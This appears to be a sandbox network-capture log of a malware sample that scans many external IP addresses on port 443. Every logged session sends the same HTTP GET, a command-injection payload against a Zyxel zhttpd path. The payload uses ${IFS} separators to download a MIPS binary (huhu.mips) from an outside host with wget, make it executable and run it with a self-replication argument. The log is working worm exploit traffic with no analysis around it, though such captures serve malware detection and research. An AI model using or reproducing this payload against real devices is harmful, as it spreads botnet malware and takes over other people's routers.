                                                Jan 29, 2024 07:07:53.448364973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5574192.168.2.234236487.150.215.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448401928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5575192.168.2.233303012.140.192.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448456049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5576192.168.2.2341786175.160.111.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448493004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5577192.168.2.235681089.247.148.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448523045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5578192.168.2.234135039.11.59.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448566914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5579192.168.2.2344240179.252.192.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448631048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5580192.168.2.234577236.161.46.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448666096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5581192.168.2.2344118191.34.21.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448689938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5582192.168.2.2357244217.44.0.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448745012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5583192.168.2.2345102133.106.13.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448771954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5584192.168.2.233613289.34.176.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448829889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5585192.168.2.234337467.219.96.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448859930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5586192.168.2.23504682.178.40.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448884964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5587192.168.2.2347454172.71.119.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448919058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5588192.168.2.2340432193.29.125.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448957920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5589192.168.2.235931076.112.168.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448988914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5590192.168.2.2340960198.183.120.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449059010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5591192.168.2.2344732221.242.109.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449132919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5592192.168.2.2360070118.255.217.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449167967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5593192.168.2.23609005.82.12.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449214935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5594192.168.2.2343222177.246.225.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449249983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5595192.168.2.234014888.156.84.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449295044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5596192.168.2.2349470167.27.57.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449327946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5597192.168.2.2352288114.152.46.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449376106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5598192.168.2.2347648140.140.198.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449394941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5599192.168.2.235968632.97.155.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449496984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5600192.168.2.233773614.231.44.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449523926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5601192.168.2.234900258.63.146.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449552059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5602192.168.2.234696870.115.179.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449594021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5603192.168.2.233961075.31.95.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449681997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5604192.168.2.2353638105.158.167.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449690104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5605192.168.2.23372049.135.163.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449698925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5606192.168.2.233782689.125.62.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449754000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5607192.168.2.2350846108.48.174.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449799061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5608192.168.2.23358525.61.86.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449851990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5609192.168.2.2345868164.221.120.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449912071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5610192.168.2.2340384195.63.215.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449915886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5611192.168.2.2341358196.48.91.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.449951887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5612192.168.2.233997488.185.15.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450010061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5613192.168.2.2359434156.71.178.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450052977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5614192.168.2.2349414103.48.37.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450092077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5615192.168.2.2359406122.217.48.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450166941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5616192.168.2.2359984101.239.153.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450175047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5617192.168.2.233597454.209.251.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450193882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5618192.168.2.2339060117.22.78.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450263023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5619192.168.2.2338934166.174.198.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450293064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5620192.168.2.2344026177.130.13.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450351000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5621192.168.2.233356231.182.97.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450385094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5622192.168.2.2355998134.254.90.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450427055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5623192.168.2.2345912158.159.182.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450469017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5624192.168.2.2354962165.182.245.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450516939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5625192.168.2.2342906125.3.219.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450546980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5626192.168.2.2354940112.225.236.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450571060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5627192.168.2.2353334136.246.131.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450619936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5628192.168.2.2347042129.138.137.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450684071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5629192.168.2.2337282210.151.197.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450712919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5630192.168.2.233707273.33.17.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450726986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5631192.168.2.234201684.191.253.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450809002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5632192.168.2.2336822219.187.190.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450830936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5633192.168.2.2347314184.204.119.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450895071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5634192.168.2.2336356198.136.224.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450908899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5635192.168.2.2356012222.176.109.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450963020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5636192.168.2.2344494134.248.32.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.450984001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5637192.168.2.2348484172.249.17.41443
                                                TimestampBytes transferredDirectionData
